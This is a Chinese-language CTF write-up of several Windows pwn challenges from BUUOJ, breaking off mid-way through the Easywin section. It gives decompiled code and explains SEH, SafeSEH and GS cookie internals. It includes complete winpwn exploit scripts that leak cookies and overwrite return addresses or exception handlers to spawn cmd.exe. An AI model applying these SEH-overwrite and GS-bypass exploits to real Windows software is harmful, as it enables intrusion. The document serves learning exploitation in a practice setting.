BUUOJ 刷题记录 -- Windows Pwn

本来去年暑假开始学习windows pwn,奈何需要备战考研所以搁置了,现在重新捡起来开始学习,记录一下BUUOJ上做的几个windows pwn题,总的来说windows pwn相对于linux pwn会略显复杂,机制更为繁琐,但是两者仍有一些共通之处。

此外,有关windows的一些保护机制以及绕过方式,将会结合题目一起提到而并不打算单独拎出来做总结。其实这方面的内容网上也有非常多的参考资料,整理得也相当好了,我也就不做过多得重复工作,遇到的时候再稍做记录效率会高一些。

[Windows][inCTF2019]warmup

题目分析

逻辑很简单,程序先是提供了一个格式化字符串漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int fmt_str()
{
HANDLE hHeap; // [esp+0h] [ebp-2Ch]
void *lpBuffer; // [esp+4h] [ebp-28h]
char fmt[24]; // [esp+8h] [ebp-24h] BYREF
int v4; // [esp+20h] [ebp-Ch]
__int16 v5; // [esp+24h] [ebp-8h]

strcpy(fmt, "Tell me what you want :");
v4 = 0;
v5 = 0;
hHeap = GetProcessHeap();
lpBuffer = HeapAlloc(hHeap, 8u, 0x150u);
printf(fmt);
ReadFile(stdin, lpBuffer, 0x150u, 0, 0);
printf((char *)lpBuffer);
printf("\n");
return 0;
}

后面直接给了个栈溢出:

1
2
3
4
5
6
7
8
9
10
11
int __cdecl main(int argc, const char **argv, const char **envp)
{
char Buffer[64]; // [esp+0h] [ebp-44h] BYREF

init_buf();
printf("Welcome ------ Banner\n");
j_fmt_str();
printf("Did you make something out of it ??? :");
ReadFile(stdin, Buffer, 0x60u, 0, 0);
return 0;
}

此外还提供了一个后门,直接读flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int backdoor()
{
DWORD NumberOfBytesWritten; // [esp+0h] [ebp-30h] BYREF
HANDLE hFile; // [esp+4h] [ebp-2Ch]
DWORD NumberOfBytesRead; // [esp+8h] [ebp-28h] BYREF
char Buffer[32]; // [esp+Ch] [ebp-24h] BYREF

hFile = CreateFileA(aFlag, 0x80000000, 0, 0, 3u, 0x80u, 0);
while ( ReadFile(hFile, Buffer, 0x20u, &NumberOfBytesRead, 0)
&& NumberOfBytesRead
&& WriteFile(stdout, Buffer, NumberOfBytesRead, &NumberOfBytesWritten, 0) )
;
return 0;
}

利用思路

  1. 首先利用格式化字符串漏洞,读ebp,cookie和程序返回地址,从而得到程序加载的基地址。
  2. 由于栈溢出的字节数不够用,所以利用栈溢出劫持返回地址到0x00406D3D的位置:
    1
    2
    3
    4
    5
    6
    7
    8
    .text:00406D34                 push    0               ; lpOverlapped
    .text:00406D36 push 0 ; lpNumberOfBytesRead
    .text:00406D38 push 60h ; '`' ; nNumberOfBytesToRead
    .text:00406D3A lea eax, [ebp+Buffer]
    .text:00406D3D push eax ; lpBuffer
    .text:00406D3E mov ecx, stdin
    .text:00406D44 push ecx ; hFile
    .text:00406D45 call ds:ReadFile
    这样,可以通过控制栈上传递给ReadFilelpOverlappedlpNumberOfBytesReadnNumberOfBytesToRead(主要是这个)参数,实现再次栈溢出的效果,这样就可以读入一段更长的ROP。
  3. 但是由于远程环境中的flag是放在flag.txt里面的(简直坑爹),而后门里读的是/flag文件,显然直接跳到后门执行根本拿不到flag。
  4. 所以需要通过ROP把.data段上存放的”/flag”字符串给改成”./flag.txt”,再跳到后门执行即可。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from winpwn import *
import sys

context.log_level = 'debug'
context.arch = 'i386'

p = process("./warmup.exe")
if len(sys.argv) == 2 and sys.argv[1] == '1':
windbgx.attach(p)

# p = remote("node3.buuoj.cn", 26586)

backdoor = 0x6C80
stack_offset = 12

# leak GS and ebp
payload = "%p " * 13
p.sendlineafter("Tell me what you want :", payload)
res = p.recvline()
PIE = int(res[-12:-4], 16) - 0x6D27
cookie = int(res[-30:-22], 16)
ebp = int(res[-21:-13], 16)
GS = cookie ^ (ebp - 0x4C)

# read gadget to ReadFile return address
payload = "A" * 0x40 + p32(GS ^ ebp) # cookie
payload += p32(ebp) # ebp
payload += p32(PIE + 0x6D3E) # return address (ReadFile)
payload += p32(ebp) + p32(0x100) + p32(0) * 2 # args for ReadFile
p.sendafter("Did you make something out of it ??? :", payload)

# write gadget "pop ebp; ret" to return address of ReadFile to bypass canary check
# ------ NOTICE: __stdcall ------
# and write gadget to change string "./flag" on .data segment to "./flag.txt" and then return to backdoor
payload = p32(PIE + 0x6d59) # pop ebp; ret
payload += "A" * 0x14 # pop args
payload += p32(ebp + 0x34)
payload += p32(PIE + 0x6D3E) # return address (ReadFile)
payload += p32(PIE + 0x6301C) + p32(0x100) + p32(0) * 2 # args for ReadFile
payload += p32(GS ^ (ebp + 0x34))
payload += p32(0) # where ebp points to
payload += p32(PIE + backdoor) # return to backdoor
p.send(payload)

# write "./flag.txt"
payload = "./flag.txt\x00"
sleep(0.1)
p.send(payload)

print("[*] cookie: %s" % hex(cookie))
print("[*] ebp: %s" % hex(ebp))

p.interactive()

[Windows][Others]BabyROP

题目分析

整个程序逻辑很简单,也没开GS保护:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
int __cdecl main(int argc, const char **argv, const char **envp)
{
FILE *v3; // eax
int i; // esi
char v5; // al
FILE *v6; // eax
FILE *v7; // eax
int v8; // esi
int j; // ebx
char v10; // al
FILE *v11; // eax
char v13[100]; // [esp+Ch] [ebp-CCh] BYREF
char v14[100]; // [esp+70h] [ebp-68h] BYREF
int v15; // [esp+D4h] [ebp-4h] BYREF

puts("input your name");
v3 = _iob_func();
fflush(v3 + 1);
for ( i = 0; i < 100; ++i )
{
v5 = getchar();
if ( v5 == 10 )
break;
v14[i] = v5;
}
printf("hello %s\n", v14);
v6 = _iob_func();
fflush(v6 + 1);
puts("input your message length");
v7 = _iob_func();
fflush(v7 + 1);
scanf("%d\n", &v15);
v8 = 0;
for ( j = v15; v8 < j; v13[v8++] = v10 )
{
v10 = getchar();
if ( v10 == 10 )
break;
}
puts("leave your message");
printf("your mesage is %s\n", v13);
printf("press enter to exit\n");
v11 = _iob_func();
fflush(v11 + 1);
getchar();
return 0;
}

首先输入的name没有末尾补0,所以可以利用这个leak出栈上残留的数据。
其次后面直接给了一次栈溢出的机会。

利用思路

  1. name的buffer后偏移为0x64的地方存有MSVCR100.dll中函数的地址,利用这个将MSVCR100.dll的基地址算出来,并得到MSVCR100.dll中的system和”cmd.exe”的地址。
  2. 利用栈溢出直接劫持返回地址,布置ROP执行system("cmd.exe")

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from winpwn import *
import sys

context.log_level = 'debug'
context.arch = 'i386'

p = process("./babyrop.exe")
if len(sys.argv) == 2 and sys.argv[1] == '1':
windbgx.attach(p)

# p = remote("node3.buuoj.cn", 29890)

str_cmd_exe = 0x1ED0
system_offset = 0x307FB

# leak PIE
payload = "A" * 0x63 + "@"
p.sendlineafter("input your name", payload)
p.recvuntil("@")
dll_base = u32(p.recv(4)) - 0x261b1
system = dll_base + system_offset
cmd_exe = dll_base + str_cmd_exe

# getshell
p.sendlineafter("input your message length", str(0x100))
payload = 'A' * 0xCC + p32(0) + p32(system) + p32(0) + p32(cmd_exe)
p.sendline(payload)
p.sendlineafter("press enter to exit", "")

print("[*] dll_base: %s" % hex(dll_base))

p.interactive()

[Windows][HITBGSEC]BABYSHELLCODE

题目分析

程序开始的时候,先做一个简单的初始化操作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
int init()
{
_DWORD *v0; // ebx
FILE *v1; // eax
FILE *v2; // eax
int v3; // ecx

v0 = malloc(0x80u);
v1 = _acrt_iob_func(1u);
setvbuf(v1, 0, 4, 0);
v2 = _acrt_iob_func(0);
setvbuf(v2, 0, 4, 0);
if ( init_scmgr() < 0 )
{
puts("error to init scmgr!");
exit(0);
}
v3 = 1;
*v0 = init_scmgr;
do
{
v0[v3] = 0x10DCD * v0[v3 - 1];
++v3;
}
while ( v3 < 32 );
key = 0;
qmemcpy(buf, v0, sizeof(buf));
free(v0);
enabled = 1;
puts("Hey, Welcome to shellcode test system!");
return 0;
}

这里调用了一个自实现的scmgr.dll中的scmgr_init函数,以及利用init_scmgr的地址初始化了一个int[32]的buffer。

其中scmgr_init实现如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int init_scmgr()
{
LPVOID v0; // eax
int result; // eax
struct _SYSTEM_INFO SystemInfo; // [esp+0h] [ebp-24h] BYREF

GetSystemInfo(&SystemInfo);
page_size = SystemInfo.dwPageSize;
max_size = 20 * SystemInfo.dwPageSize;
v0 = VirtualAlloc(0, 20 * SystemInfo.dwPageSize, 0x1000u, 0x40u);
addr = (int)v0;
if ( v0 )
{
printf("Global memory alloc at %p\n", (char)v0);
result = addr;
buffer_start = addr;
}
else
{
puts("Error to alloc globalmemory");
result = -1;
}
return result;
}

也就是分配出了20个page的内存供后续使用。

后面菜单提供addshowdeleterun四个基本功能,顾名思义,就是添加、打印、删除、执行shellcode的操作。
比较关键的是run这里:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
int run()
{
int v0; // ebx
struct struct_shellcode *v1; // edi
int result; // eax
_DWORD *v3; // esi
char Src[100]; // [esp+10h] [ebp-80h] BYREF
CPPEH_RECORD ms_exc; // [esp+78h] [ebp-18h]

memset(Src, 0, sizeof(Src));
ms_exc.registration.TryLevel = 0;
puts("shellcode index:");
v0 = read_n();
v1 = shellcode_array[v0];
if ( v1 )
{
if ( enabled )
{
v3 = (_DWORD *)v1->code;
memcpy(Src, v3, v1->length);
*v3 = -1;
}
((void (__thiscall *)(int))v1->code)(v1->code);
if ( enabled )
memcpy((void *)shellcode_array[v0]->code, Src, shellcode_array[v0]->length);
result = 0;
}
else
{
puts("invalid index");
ms_exc.registration.TryLevel = -2;
result = -1;
}
return result;
}

enabled == 1的情况下(其实总是1),调用memcpy(Src, v3, v1->length);向栈上的Src复制了一段shellcode,而这个shellcode的长度显然可以超过Src的长度100,所以这里存在一个栈溢出;其次,后面((void (__thiscall *)(int))v1->code)(v1->code);执行shellcode前,*v3 = -1;首先将shellcode的前4 bytes置了0xFFFFFFFF,所以肯定会触发错误,从而陷入到错误处理函数中执行,这里就涉及到windows的SEH机制。

SEH (Structured Exception Handling)

SEH(Structured Exception Handling)结构化异常处理是windows的一种异常处理机制,C语言中主要通过try & catch实现。
在代码层面,windows相应的函数栈上也会布置一种特殊的结构:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
typedef struct CPPEH_RECORD
{
DWORD old_esp;
DWORD exc_ptr;
_EH3_EXCEPTION_REGISTRATION registration;
}CPPEH_RECORD, *PCPPEH_RECORD;

struct _EH3_EXCEPTION_REGISTRATION
{
  struct _EH3_EXCEPTION_REGISTRATION *Next;
  PVOID ExceptionHandler;
  PSCOPETABLE_ENTRY scopeTable;
  DWORD TryLevel;
};

其中:

  • prev指向下一个EXCEPTION_FRAME
  • handler为异常处理函数_except_handler4
  • scopetable是一个指针,指向PSCOPETABLE_ENTRY,在这里开启GS保护的情况下,它是:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    struct _EH4_SCOPETABLE {
    DWORD GSCookieOffset;
    DWORD GSCookieXOROffset;
    DWORD EHCookieOffset;
    DWORD EHCookieXOROffset;
    _EH4_SCOPETABLE_RECORD ScopeRecord[1];
    };

    struct _EH4_SCOPETABLE_RECORD {
    DWORD EnclosingLevel;
    long (*FilterFunc)();
    union {
    void (*HandlerAddress)();
    void (*FinallyFunc)();
    };
    };
  • TryLevel可以视为对相应_EH4_SCOPETABLE_EH4_SCOPETABLE_RECORD的一个索引。

从栈的布局上看(借用一张图),为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
                                                ExceptionPointers
+-------------------+
+---------->| ExceptionRecord |
| +-------------------+
| | ContextRecord |
| +-------------------+
EH4 Stack |
+-------------------+ | Scope Table
Low | ...... | | +-------------------+
+-------------------+ | | GSCookieOffset |
ebp - 18h | esp | | +-------------------+
+-------------------+ | | GSCookieXorOffset |
ebp - 14h | ExceptionPointers |---+ +-------------------+
+-------------------+ | EHCookieOffset |
ebp - 10h | Next | +-------------------+
+-------------------+ | EHCookieXorOffset |
ebp - 0Ch | ExceptionHandler | +-------------------+
+-------------------+ +---------->| EncloseingLevel |---> 0xFFFFFFFE
ebp - 08h | Scope Table | | Level 0 +-------------------+
+-------------------+ | | FilterFunc |
ebp - 04h | TryLevel |---+ +-------------------+
+-------------------+ | | HandlerFunc |
ebp | ebp | | +-------------------+
+-------------------+ +---------->| EncloseingLevel |---> 0x00000000
High | ...... | Level 1 |-------------------+
+-------------------+ | FilterFunc |
+-------------------+
| HandlerFunc |
+-------------------+

检查_EH3_EXCEPTION_REGISTRATION->prev合法之后,会通过调用_EH3_EXCEPTION_REGISTRATION->ExceptionHandler,也就是_except_handler4函数进入异常处理流程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
void __cdecl ValidateLocalCookies(void (__fastcall *cookieCheckFunction)(unsigned int), _EH4_SCOPETABLE *scopeTable, char *framePointer)
{
unsigned int v3; // esi@2
unsigned int v4; // esi@3

if ( scopeTable->GSCookieOffset != -2 )
{
v3 = *(_DWORD *)&framePointer[scopeTable->GSCookieOffset] ^ (unsigned int)&framePointer[scopeTable->GSCookieXOROffset];
__guard_check_icall_fptr(cookieCheckFunction);
((void (__thiscall *)(_DWORD))cookieCheckFunction)(v3);
}
v4 = *(_DWORD *)&framePointer[scopeTable->EHCookieOffset] ^ (unsigned int)&framePointer[scopeTable->EHCookieXOROffset];
__guard_check_icall_fptr(cookieCheckFunction);
((void (__thiscall *)(_DWORD))cookieCheckFunction)(v4);
}

int __cdecl _except_handler4_common(unsigned int *securityCookies, void (__fastcall *cookieCheckFunction)(unsigned int), _EXCEPTION_RECORD *exceptionRecord, unsigned __int32 sehFrame, _CONTEXT *context)
{
// xor scope table
scopeTable_1 = (_EH4_SCOPETABLE *)(*securityCookies ^ *(_DWORD *)(sehFrame + 8));

// sehFrame is the address of _EH3_EXCEPTION_REGISTRATION at stack
framePointer = (char *)(sehFrame + 16);
scopeTable = scopeTable_1;

// Validate GS
ValidateLocalCookies(cookieCheckFunction, scopeTable_1, (char *)(sehFrame + 16));
__except_validate_context_record(context);

if ( exceptionRecord->ExceptionFlags & 0x66 )
{
......
}
else
{
exceptionPointers.ExceptionRecord = exceptionRecord;
exceptionPointers.ContextRecord = context;
tryLevel = *(_DWORD *)(sehFrame + 12);
*(_DWORD *)(sehFrame - 4) = &exceptionPointers;
if ( tryLevel != -2 )
{
while ( 1 )
{
v8 = tryLevel + 2 * (tryLevel + 2);
filterFunc = (int (__fastcall *)(_DWORD, _DWORD))*(&scopeTable_1->GSCookieXOROffset + v8);
scopeTableRecord = (_EH4_SCOPETABLE_RECORD *)((char *)scopeTable_1 + 4 * v8);
encloseingLevel = scopeTableRecord->EnclosingLevel;
scopeTableRecord_1 = scopeTableRecord;
if ( filterFunc )
{
// call FilterFunc
filterFuncRet = _EH4_CallFilterFunc(filterFunc);
......
if ( filterFuncRet > 0 )
{
......
// call HandlerFunc
_EH4_TransferToHandler(scopeTableRecord_1->HandlerFunc, v5 + 16);
......
}
}
......
tryLevel = encloseingLevel;
if ( encloseingLevel == -2 )
break;
scopeTable_1 = scopeTable;
}
......
}
}
......
}

简单描述一下这个流程:

  1. 首先通过xor解密_EH3_EXCEPTION_REGISTRATION->scopetable,得到相应的地址。
  2. 获取栈上存放的old ebp的位置(也就是当前栈的ebp,即framePointer),进行如下check:
    • 如果scopeTable->GSCookieOffset != -2,则保证ebp ^ cookie == __security_cookie,这里ebp就是当前函数栈的ebp,cookie也是当前栈的cookie,与函数返回前对GS进行check的逻辑一致。
    • ebp ^ *(ebp - scopetable->EHCookieOffset) == __security_cookie
  3. 获取栈上存放的_EH3_EXCEPTION_REGISTRATION->tryLevel,检查该TryLevel != -2的情况下找到对应的_EH4_SCOPETABLE->_EH4_SCOPETABLE_RECORD
  4. 如果_EH4_SCOPETABLE_RECORD->FilterFunc不为空,则执行FilterFunc,返回值大于0则继续执行HandlerFunc

利用思路

  1. 首先利用程序最开始输入name再打印name,leak出栈上存放的ebp,cookie和return address,这样可以计算出__security_cookie、栈地址和程序基地址。
  2. 由于在init中,程序获取了scmgr_init的地址,并利用它生成了一个int[32]的buffer,如果调用5号功能,可以得到加密后的buffer内容,因此只要获得明文的buffer内容,我们就可以拿到scmgr_init的地址,进而获得scmgr.dll的基地址,获得其中存在的后门test_getshell的地址。
  3. 考虑该加密应该是单向散列,所以逆推不太可能;此外,scmgr_init的地址为scmgr.dll + 0x1100scmgr.dll的基址低2 bytes为0,所以只需要爆破高2 bytes即可,速度很快。
  4. 拿到scmgr.dll的基址,就可以利用run功能中的栈溢出,布置栈上的内容;只要伪造_EH3_EXCEPTION_REGISTRATION->ExceptionHandler为后门地址,加上_EH3_EXCEPTION_REGISTRATION->prev指向原来的地方,即可再触发异常的时候执行该后门getshell。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
from winpwn import *
import sys

context.log_level = 'error'
context.arch = 'i386'

p = process("./babyshellcode.exe")
# p = remote("node3.buuoj.cn", 29190)

def leave_name(name):
p.sendlineafter("leave your name", name)

def choose(choice):
p.sendlineafter("Option:", str(choice))

def add(size, shellcode):
choose(1)
p.sendlineafter("shellcode size:", str(size))
p.sendlineafter("shellcode name:", "AAA")
p.sendlineafter("shellcode description:", "AAA")
p.sendlineafter("shellcode:", shellcode)

def show():
choose(2)

def delete(idx):
choose(3)
p.sendlineafter("shellcode index:", str(idx))

def run(idx):
choose(4)
p.sendlineafter("shellcode index:", str(idx))

def read_challenge_code():
choose(5)
choose(1)
p.recvuntil("Your challenge code is ")
secret = p.recvline().strip().split('-')
value_array = [int(item, 16) for item in secret]
p.sendlineafter("challenge response:", "AAA")
return value_array

def init_buf(val):
buf = [val]
for i in range(31):
buf.append((buf[-1] * 0x10DCD) & 0xFFFFFFFF)
for i in range(4):
buf.append(0)
return buf

def encrypt(buf, key):
v0 = ((1 << 8) + key - 1) & 0x1F
v2 = buf[(key + 3) & 0x1F] ^ buf[key] ^ (buf[(key + 3) & 0x1F] >> 8)
buf[32] = buf[v0]
v1 = buf[32]
buf[33] = v2
v3 = buf[(key + 10) & 0x1F]
v4 = buf[((1 << 8) + key - 8) & 0x1F] ^ v3 ^ (((v3 ^ (32 * buf[((1 << 8) + key - 8) & 0x1F])) << 14) & 0xFFFFFFFF)
v5 = key & 0xFF
buf[34] = v4
buf[key] = v2 ^ v4
buf[v0] = (v1 ^ v2 ^ v4 ^ ((v2 ^ (16 * (v1 ^ (4 * v4)))) << 7)) & 0xFFFFFFFF
key = ((1 << 8) + v5 - 1) & 0x1F
return buf, key, buf[key]

def bruteforce_scmgr(value_array):
final_res = None
for high2bytes in range(0x10000):
addr = (high2bytes << 16) | 0x1090
buf = init_buf(addr)
key = 0
success = True
for item in value_array[::-1]:
buf, key, res = encrypt(buf, key)
# print(buf)
if res != item:
success = False
break
if success == True:
final_res = high2bytes << 16
break
return final_res

leave_name("A" * 0x10 + "addr")
p.recvuntil("addr")
canary = u32(p.recv(4))
old_ebp = u32(p.recv(4))
text_base = u32(p.recv(4).strip().ljust(4, "\x00")) - 0x1AFA
ebp_of_main = old_ebp - 0x48
security_cookie = canary ^ ebp_of_main

assert(text_base & 0xFFFF == 0)

if len(sys.argv) == 2 and sys.argv[1] == '1':
windbgx.attach(p)

cipher_array = read_challenge_code()
scmgr = bruteforce_scmgr(cipher_array)
assert(scmgr != None)

backdoor = scmgr + 0x1100
except_handler4 = text_base + 0x18A0
ebp_of_run = ebp_of_main - 0x34
buf_addr = ebp_of_run - 0x80
prev_seh = ebp_of_main + 0x38
payload = "A" * 0x70 # padding
payload += p32(prev_seh) + p32(backdoor) # | next | exception_handler

add(len(payload), payload)
run(0)

print("[+] scmgr address is: " + hex(scmgr))
print("[+] text base is: " + hex(text_base))
print("[+] security_cookie is: " + hex(security_cookie))
print("[+] ebp of main is: " + hex(ebp_of_main))

p.interactive()

[Windows][HITBGSEC]BABYSTACK & [Windows][第五空间 2019 决赛]PWN9 & [Windows][SUCTF 2019]BabyStack

题目分析

首先该程序开启了SafeSEH保护(虽然winchecksec没识别出来)。
其次该程序逻辑十分简单:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// positive sp value has been detected, the output may be wrong!
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
FILE *v3; // eax
FILE *v4; // eax
int v5; // [esp+20h] [ebp-C0h]
int v6; // [esp+24h] [ebp-BCh]
_DWORD *v7; // [esp+28h] [ebp-B8h]
int i; // [esp+2Ch] [ebp-B4h]
char v9[128]; // [esp+44h] [ebp-9Ch] BYREF
CPPEH_RECORD ms_exc; // [esp+C8h] [ebp-18h]

ms_exc.registration.TryLevel = 0;
v3 = (FILE *)_acrt_iob_func(1);
setvbuf(v3, 0, 4, 0);
v4 = (FILE *)_acrt_iob_func(0);
setvbuf(v4, 0, 4, 0);
puts("ouch! Do not kill me , I will tell you everything");
printf("stack address = 0x%x\n", v9);
printf("main address = 0x%x\n", main);
for ( i = 0; i < 10; ++i )
{
puts("Do you want to know more?");
read_str((int)v9, 10);
v6 = strcmp(v9, "yes");
if ( v6 )
v6 = v6 < 0 ? -1 : 1;
if ( v6 )
{
v5 = strcmp(v9, "no");
if ( v5 )
v5 = v5 < 0 ? -1 : 1;
if ( !v5 )
break;
read_str((int)v9, 256);
}
else
{
puts("Where do you want to know");
v7 = (_DWORD *)read_n();
printf("Address 0x%x value is 0x%x\n", v7, *v7);
}
}
ms_exc.registration.TryLevel = -2;
puts("I can tell you everything, but I never believe 1+1=2");
puts("AAAA, you kill me just because I don't think 1+1=2??");
exit(0);
}

最开始的时候,main地址和栈地址都给出了;后面又给了10次任意地址读的机会,如果输入”no”,则会提供一次栈溢出的机会;此外,程序还提供了getshell的后门:

1
2
.text:001B138D                 push    offset Command  ; "cmd"
.text:001B1392 call ds:system

不过由于开了SafeSEH,如果用BABYSHELLCODE的方法覆盖exception_handler,则无法通过check,所以这里需要了解一下SafeSEH在普通SEH基础上添加了什么。

SafeSEH

SafeSEH简单来说,就是在SEH的基础上,添加了额外的check。
当异常发生时,异常处理过程RtlDispatchException首先检查异常处理节点是否在栈上, 如果不在栈上程序将终止异常处理, 其次检查异常处理Handler是否在栈上, 如果在栈上程序将止异常处理. 最后检测调用RtlIsValidHandler检测Handler有效性:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
BOOL RtlIsValidHandler(handler)
{
// 在加载模块的进程空间
if (handler is in an image) // step 1
{
if (image has the IMAGE_DLLCHARACTERISTICS_NO_SEH flag set)
return FALSE; // 该标志设置,忽略异常处理,直接返回FALSE

if (image has a SafeSEH table) // 是否含有SEH表
if (handler found in the table)
return TRUE; // 异常处理handle在表中,返回TRUE
else
return FALSE; // 异常处理handle不在表中,返回FALSE

if (image is a .NET assembly with the ILonly flag set)
return FALSE; // .NET 返回FALSE
// fall through
}

// handle在不可执行页上面
if (handler is on a non-executable page) // step 2
{
if (ExecuteDispatchEnable bit set in the process flags)
return TRUE; // DEP关闭,返回TRUE;否则抛出异常
else
raise ACCESS_VIOLATION; // enforce DEP even if we have no hardware NX
}

// 在加载模块内存之外,并且是可执行页
if (handler is not in an image) // step 3
{
if (ImageDispatchEnable bit set in the process flags)
return TRUE; // 允许在加载模块内存空间外执行,返回验证成功
else
return FALSE; // don't allow handlers outside of images
}

// everything else is allowed
return TRUE;
}

上面伪代码里的ExecuteDispatchEnableImageDispatchEnable标志用来控制Handler在不可执行内存或者不在异常模块的映像内时, 是否可以执行。默认情况下, 如果进程DEP开启, 两位为0, DEP关闭, 两位为1。

利用思路

  1. 利用任意地址读,把栈上的cookie给leak出来。
  2. 利用栈溢出,在栈上伪造一个_EH4_SCOPETABLE结构,使得FilterFunc为backdoor;同时绕过所有的check,保证异常处理流程正确执行到FilterFunc上。

从上面SEH原理分析_except_handler4_common的流程时,注意到先会检查FilterFunc是否为空再依次执行FilterFuncHandlerFunc;但在实际调试过程中发现,即使FilterFunc == NULL,设置HandlerFunc = backdoor最终也能getshell,只是相比之下会延迟一段时间。
由于_except_handler4_common代码也是借用其他师傅博客里的,中间省略的部分也不知从何获得,所以暂时还不知道原因。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from winpwn import *
import sys

context.log_level = 'debug'
context.arch = 'i386'

main = 0x10b0
target = 0x139B
__security_cookie_offset = 0x4004
backdoor = 0x138D
handler = 0x1460

p = process("./babystack.exe")
if len(sys.argv) == 2 and sys.argv[1] == '1':
windbgx.attach(p)

# p = remote('node3.buuoj.cn', 26510)

p.recvuntil("stack address = 0x")
stack_address = int(p.recv(8), 16)
cookie_address = stack_address + 0x80
p.recvuntil("main address = 0x")
main_address = int(p.recv(6), 16)
target_address = main_address - main + target
__security_cookie_address = main_address - main + __security_cookie_offset
backdoor_address = main_address - main + backdoor
exception_handler = main_address - main + handler

# leak cookie
p.sendlineafter("Do you want to know more?", "yes")
p.sendlineafter("Where do you want to know", str(cookie_address))
p.recvuntil("value is 0x")
cookie = int(p.recv(8), 16)

# leak __security_cookie
p.sendlineafter("Do you want to know more?", "yes")
p.sendlineafter("Where do you want to know", str(__security_cookie_address))
p.recvuntil("value is 0x")
__security_cookie = int(p.recv(8), 16)

# fake scope table
p.sendlineafter("Do you want to know more?", "go")
payload = "AAAA"
# | __security_cookieCookieOffset | __security_cookieCookieXorOffset | EHCookieOffset | EHCookieXorOffset |
payload += p32(0xffffffe4) + p32(0) + p32(0xffffff20) + p32(0)
# | EnclosingLevel | FilterFunc | HandlerFunc |
payload += p32(0xfffffffe) + p32(0) + p32(backdoor_address)
payload = payload.ljust(0x80, 'A') # padding
payload += p32(cookie) # cookie
payload += p32(0) * 2 # padding
# | next | exception_handler | scope_table ^ security_cookie | TryLevel |
payload += p32(stack_address + 0xd4) + p32(exception_handler) + p32(__security_cookie ^ (stack_address + 4)) + p32(0)

p.sendline(payload)
p.sendlineafter("Do you want to know more?", 'yes')
p.sendlineafter("Where do you want to know", '1')

p.interactive()

[Windows][Insomni’hack Teaser 2017]Easywin

题目分析

首先winchecksec一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  winchecksec.exe .\easywin.exe
Results for: .\easywin.exe
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "Present"
Force Integrity : "NotPresent"
Isolation : "Present"
NX : "Present"
SEH : "Present"
CFG : "Present"
RFG : "NotPresent"
SafeSEH : "NotApplicable"
GS : "Present"
Authenticode : "NotPresent"
.NET : "NotPresent"

需要注意的是这里开启了CFG保护,至于CFG保护的原理后文会提到。

题目逻辑比较简单,主要是add中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
// ...
do
{
while (1)
{
printf("Type?\n");
printf(" d - Droideka\n b - B1 Battle Droid\n p - Probe Droid\n i - IG-88\n~~~~~~~~~~~~~~~~~~~~~~\n");
scanf("%c", v9);
getchar();
if (v9[0] == 'b')
break;
switch (v9[0])
{
case 'd':
strcpy_s(v5 + 256, 0x100ui64, "[+] A Droideka lands on %1$s (%2$d, %3$d).\n");
*((_QWORD *)v5 + 64) = func_msg1;
goto LABEL_30;
case 'i':
strcpy_s(v5 + 256, 0x100ui64, "[+] IG-88 has a bounty of %$2d%$3d$ on planet %$1s.\n");
*((_QWORD *)v5 + 64) = func_msg2;
goto LABEL_30;
case 'p':
strcpy_s(v5 + 256, 0x100ui64, "[+] Probe Droid arrived on planet %$1s after %$2d days and %$3d hours...\n");
*((_QWORD *)v5 + 64) = func_msg3;
goto LABEL_30;
}
printf("Invalid type.\n");
v8 = 1;
}
strcpy_s(v5 + 256, 0x100ui64, "[+] An army of %$3d%$2d B1 Battle Droid arrives on %$1s.\n");
*((_QWORD *)v5 + 64) = func_msg4;
LABEL_30:;
} while (v8);
// ...

这里在偏移0x200的位置放置了一个函数指针,在attack功能中会被调用:

1
2
3
4
5
6
7
8
9
10
// ...
if ( v5 && *(_QWORD *)(v2 + 512) )
{
v8 = rand() % 100;
v9 = rand();
